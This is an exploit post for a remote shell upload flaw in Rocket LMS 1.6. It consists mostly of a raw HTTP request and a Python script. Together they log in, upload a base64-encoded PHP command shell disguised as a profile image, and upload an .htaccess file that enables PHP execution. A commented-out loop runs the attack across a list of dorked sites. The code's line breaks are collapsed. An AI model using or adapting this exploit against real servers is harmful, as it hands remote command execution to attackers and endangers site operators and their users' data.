Headline
Rocket LMS 1.6 Shell Upload
Rocket LMS version 1.6 suffers from a remote shell upload vulnerability.
# Exploit Title: Rocket LMS - Learning Management System Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735# Version: Version 1.6# Tested on Ubuntu 18.04base64 encode your payloadafter data image write your extension upload-----There is .htaccess restriction on rocket lms public folder upload your own htaccess to avatar folder first.Enjoy!-------Request-----------POST /panel/setting HTTP/1.1Host: localhostContent-Length: 214Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/panel/setting/step/2Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlBhNzBxQi96TVJwTm5KdEI0Ry9xUUE9PSIsInZhbHVlIjoiUE80Y2h6WlU2N3FjZDBaMldkZU1pcDg3ZmVLWitZSUxsQVBIc0lHdUV0ZkdtL2JYYzZ0Q2RsL1JSQXhVZWFJZGsrcGlOTGJ5Qk8zWWlTVDVWL3ZlNEY3NFpEc1RaT0NSVS9EL2lFWXQyTEtLQXlFR0RPVjREclI4QkMwdWRQb3hzcEtlZ1ZZanQ0ZDAyYWZOMjNjcWo1anFtSFdRdFYwY2laTlJLbnl2TjBVQWdKTlB6Uk4reWlJUTRNSmkrYkhXU1BJMmxpNU05TngxUklxNEM5azY0bFp4NVg2eHdwT1VSci9Od2RCQklsMD0iLCJtYWMiOiI2NzFjZDkxMDRlYWEyODBmMGUxNDg3YmFmZmQ0M2YwMzhlMmViNTYxYjk3YTZmNTk0YzA1MGFkOGY2YmFkN2I1In0%3D; XSRF-TOKEN=eyJpdiI6IjRqa1JIMXQrd0xuZW1za0FXR0lVbGc9PSIsInZhbHVlIjoidXlybG4rTlRraVpXV1dRSE5EWXcrYnVyZnpYUHRmSmpvQ0tuUUI3WEFDZU5HdWpsbXJBRi9WaStzWXVDNEJLa2UzT3BTSkdobzdPc0dUb0V1TzUyMGdPVHRHY3NNR0x2YlpVT1YxMy9DYXVIMGxERktaZXZtT1pPQUF4Y0N6U0IiLCJtYWMiOiI2MTAyMGJlZmFhNjk2ZWRiOWViYjVlZWNhOWUyYzFmYTJjNjdmYTdmZWNmY2ZhMTFjMTg3NmQwMDAxNjg1OTVjIn0%3D; rocketlms_session=eyJpdiI6Ik1yOGpZZmFGRnJMY1BBYkNBVUhYT1E9PSIsInZhbHVlIjoiOWkrN1JmUHhqc21qTlZqdytPdUJaSnpPQW0ybXNlVGpWLzViVzFpbHpheUF2QUJYRTJNUmpCaC9xZk5CRWg1eGpiVFZ4ejFOOTdLZ3NmNTkrQlhheTBBUGNVVDdPa3IvVWVSeTZ3RndxV2FRdWpWRnVvSHhzY2xKUjMvelB4dTAiLCJtYWMiOiIzNTdlNTNmNGNlMDFlMTU5NWVlOTQ1NjM0YjFjZGU4NWJmMTg5NzIzNmRhMTQxMzc4MDIyZGU2ZDM2N2JiODg2In0%3DConnection: close_token=vILAoLnB2BFEaF35K4kMmwLokzOPLMnryeYXQVzS&step=2&next_step=0&profile_image=data%3Aimage%2FPHP%3Bbase64%2CPD9waHAgJGNtZCA9IHN5c3RlbSgkX0dFVFsnY21kJ10pOwoKZWNobyAkY21kOwo/Pg==&cover_img=%2Fstore%2F995%2F7.jpgExploit:import timeimport requestsimport base64import reimport tracebackclass Rocket: def __init__(self,ssl,host,port,email,password,file): self._url_to_upload = "/panel/setting" self._url_to_login = "/login" self.host = host self.port = port self.ssl = ssl self.email = email self.password = password self.file = file def get_csrf_token(self,client,URL): fromt = client.get(URL) if 'XSRF-TOKEN' in client.cookies: csrftoken = re.findall(r'<input type="hidden" name="_token" value="(.*)"',fromt.text)[0] return csrftoken else: print("Error while fetching token") return def login(self): client = requests.session() if self.ssl == True: ssl= "https://" else: ssl= "http://" URL = str(ssl+self.host+":"+self.port+self._url_to_login) URL2 = str(ssl+self.host+":"+self.port+self._url_to_upload) csrftoken = self.get_csrf_token(client,URL) fromt = client.get(URL) # sets cookie login_data = dict(username=self.email, password=self.password, _token=csrftoken, next='/panel') r = client.post(URL, data=login_data, cookies=client.cookies) self.upload_shell(client,URL2) self.upload_htaccess(client,URL2) def upload_shell(self,client,URL): csrftoken = self.get_csrf_token(client,URL) with open(self.file,"r") as payload: to_base64 = payload.read() to_base64 = str(to_base64).encode("utf-8") base64_encoded_data= base64.b64encode(to_base64) base64_encoded_data = str(base64_encoded_data)[:-1] base64_encoded_data = str(base64_encoded_data)[2:] string = "data:image/php;base64,"+str(base64_encoded_data) data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="") r = client.post(URL, data=data, cookies=client.cookies) print(r.status_code) if r.status_code == 200: print("sent and uploaded shell :"+URL+"\n") else: print("couldn't upload shell") def upload_htaccess(self,client,URL): csrftoken = self.get_csrf_token(client,URL) string = "data:image/.htaccess;base64,UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4=" data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="") r = client.post(URL, data=data, cookies=client.cookies) print(r.status_code) if r.status_code == 200: print("sent and uploaded htaccess:"+URL+"\n") print("Go and rename file in filemanager on website") else: print("couldn't upload htaccess") elon = Rocket(True,"localhost","443","[email protected]","student" ,"/home/mm1nd/Desktop/shell.txt")elon.login()#with dork# try:# with open("sites.txt","r") as urls:# url = urls.readlines()# ssl = True# port = 443# for line in url: # try:# if "sslyok" in line:# port = 80# ssl = False# line = str(line.rstrip('%0a')) # print("trying:"+line)# elon = Rocket(ssl,line.rstrip("\n"),str(port),"[email protected]","student" ,"/home/mm1nd/Desktop/shell.txt")# elon.login()# time.sleep(1) # except Exception:# #traceback.print_exc()# print("atamadim") # finally:# print("okey")# except Exception:# print("atamadim")